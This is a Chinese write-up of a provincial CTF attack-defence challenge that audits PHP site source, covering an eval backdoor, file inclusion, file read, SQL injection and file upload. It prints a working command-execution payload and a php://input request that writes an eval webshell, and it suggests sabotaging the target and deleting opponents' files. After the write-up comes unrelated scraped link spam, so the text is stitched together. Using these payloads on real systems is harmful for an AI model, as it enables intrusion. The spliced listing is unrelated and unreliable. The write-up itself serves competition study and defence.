首先拖到D盾扫描

可以很明显的看出来确实就是两个后门

0x01 Index.php#一句话木马后门

0x02 About.php#文件包含漏洞

都可以很直观的看出来非常明显的漏洞,第一个直接就是eval一句话后门,第二个就是非常简单的文件包含;

第一个漏洞的利用代码即为:system(base64_decode("Y2F0IGZsYWcq"));

Y2F0IGZsYWcq是cat flag*进行base64编码以后的。

第二个漏洞攻击可以通过伪协议中的input写入webshell

about.php?f=php://input

post数据为:<?php fputs(fopen("shell.php","w"),'<?php eval($_POST["cmd"];?>');?>

0x03 challege.php#任意文件读取

这里在41行的时候有一个判断,如果其中一个满足那么就会exit。所以我们不能让她exit,否则不能执行readfile

40行的函数使用的有点问题,应该是parse_url,多了一个n,提供代码给我的这位师傅应该是没有修改过代码的。所以这里应该是比赛方的一个瑕疵。

我们当作parse_url来做

Parse_url函数是拿来解析url的,如下所示:

所以在看41行的代码就很简单了

我们直接让$parts['host']不为空并且等于localhost即可

0x04 SQL注入#message.php

因为我这里没有数据库环境就不多演示如何get数据了。

如果要修复,直接对$_GET[‘id’]进行操作即可。

0x05 SQL注入#logcheck.php

0x06 SQL注入#login.php

0x07 upload.php#任意文件上传

上传成功:/images/15681026431.php

登陆后flag:(因为我这儿仅有源码,所以没显示出正确的flag,比赛环境里在这里应该是可以看到flag的)

0x08 sql注入 #search.php

小结:

打开index.php就可以很明显的看到eval以及undefined index:123这里其实就基本可以猜得到,123这个参数是后门了。所以可以很快通过这个后门直接getshell拿到权限;

上面的注入均没有进行任何过滤,直接通过sqlmap就可以很简单的跑出来;

拿到权限以后,可以对代码进行审计,迅速修复漏洞不让对手入侵下这个网站;

或者利用脚本轮训删除images目录下的文件;

针对个人赛,入侵公共靶机的话,如果是可以修改代码那么就破坏功能点,如果不能修改代码那就可以预先准备好一些小脚本,例如轮训删除images目录下的所有文件。尽可能的达到自己入侵下的靶机就不要给别人入侵的机会;

积分竞猜网php源码_贵州省网络安全知识竞赛个人赛Writeup相关推荐

  1. 小说网jsp源码_基于jsp+mysql的JSP小说网

    运行环境: 最好是java jdk 1.8,我们在这个平台上运行的.其他版本理论上也可以. IDE环境: Eclipse,Myeclipse,IDEA都可以 tomcat环境: Tomcat 7.x, ...

  2. 个人发卡网搭建源码_免费建设一个个人网站到底能不能实现

    免费建一个个人网站到底能不能实现,这是现如今互联网时代想要一个个人网站的每个人都想知道的一个问题. 我们现在搭建一个网站大多都是先注册一个域名,然后购买虚拟主机或云服务器,最后找个现成的模板上传到虚拟 ...

  3. [附源码]java毕业设计英语知识竞赛报名系统

    项目运行 环境配置: Jdk1.8 + Tomcat7.0 + Mysql + HBuilderX(Webstorm也行)+ Eclispe(IntelliJ IDEA,Eclispe,MyEclis ...

  4. 齐家网php源码_上海齐家网装修多少钱-装修公司

    上海齐家网团购怎么样 我们家里当时是参加的城团网的团购会团购的~有贴心的水和午餐~就连小手掌和装订单用的拉链包都已经准备好了~可以说细节是无微不至~话说城团网活动真的是场场爆满~我好几次去晚了都没有椅 ...

  5. 2023全新纯净版本知识付费微信小程序源码_附搭建教程_亲测可用

    介绍: 主要功能 会员系统,用户登录/注册购买记录 收藏记录 基本设置 后台控制导航颜色 字体颜色 标题等设置 流量主广告开关小程序广告显示隐藏 广告主审核过审核 资源管理 后台可以添加5种类型资源灵 ...

  6. 2023新版 多功能去水印工具微信小程序源码_带流量主功能(已更新)

    简介: 2023新版 多功能去水印工具微信小程序源码_带流量主功能 自带去水印接口的多功能小程序 支持各大平台短视频去水印 支持保存封面,图集,标题等等 支持本地图片去水印 支持图片拼接 支持九宫格切 ...

  7. php企业官网源码 响应式,基于ThinkPHP5框架开发的响应式企业官网PHP源码_PC端+WAP手机端自适应+TP企业官网建站系统...

    源码介绍 基于ThinkPHP5框架开发的响应式企业官网PHP源码,是一款基于ThinkPHP5.0.10内核开发的企业建站管理系统,非常适合企业拿来二次开发自己的企业官网系统.前端界面采用流行的bo ...

  8. java毕业设计活动策划网mybatis+源码+调试部署+系统+数据库+lw

    java毕业设计活动策划网mybatis+源码+调试部署+系统+数据库+lw java毕业设计活动策划网mybatis+源码+调试部署+系统+数据库+lw 本源码技术栈: 项目架构:B/S架构 开发语 ...

  9. 计算机毕业设计Java京津冀畅游网设计(源码+系统+mysql数据库+lw文档)

    计算机毕业设计Java京津冀畅游网设计(源码+系统+mysql数据库+lw文档) 计算机毕业设计Java京津冀畅游网设计(源码+系统+mysql数据库+lw文档) 本源码技术栈: 项目架构:B/S架构 ...

最新文章

  1. 在Ubuntu 16.4.3 LTS x86_64上安装PyCharm社区版笔记
  2. qml学习笔记(二):可视化元素基类Item详解(上半场anchors等等)
  3. web前端研发工程师编程能力成长之路
  4. SQL SERVER占用服务器内存过高的解决方案
  5. 华为鸿蒙系统内部消息,华为鸿蒙系统内部曝光,并且将于年底发布?网友:还能再假点?...
  6. oracle行级的触发器,Oracle触发器Trigger2行级
  7. Eclipse Java类编辑器里出现乱码的解决方案
  8. java中channelmessage,MessageStore支持的QueueChannel与Spring Integration Java Config
  9. map to javaBean
  10. graphics | 基础绘图系统(十)——星形图、四瓣图、马赛克图
  11. 翁恺老师C语言学习笔记(十)指针_指针与数组
  12. phpstudy2018启动关闭_phpstudy2018搭建Apache https 开启php_openssl
  13. 内容分发网络(CDN)关键技术、架构与应用(一)
  14. Spring的注解@Autowired和@Resource的区别
  15. django book 制作
  16. 福昕阅读器不能完全显示整个页面的解决办法
  17. Python爬虫实战之爬取链家广州房价_03存储
  18. ITween操作API
  19. STM32 HAL库学习笔记3-HAL库外设驱动框架概述
  20. 【Python实战项目】做一个 刮刮乐 案例,一不小心....着实惊艳到我了。

热门文章

  1. Report_SRW在RDF中初始化的重要性(案例)
  2. 【转载】ASP.NET MVC中Controller与View之间的数据传递总结
  3. 1631. 最小体力消耗路径
  4. 世界第一台电脑_阿里推出云电脑“无影”,名片大小的机身,却有无穷的计算能力...
  5. java int在那个包_int intValue()
  6. 脉冲宽度调制pdm_两个相同Vpp驱动的 PAM4 MZ调制器
  7. 如何迁移home目录
  8. CvvImage.h和CvvImage.cpp
  9. 空循环和无穷循环的区别
  10. Eclipse的Spring库导入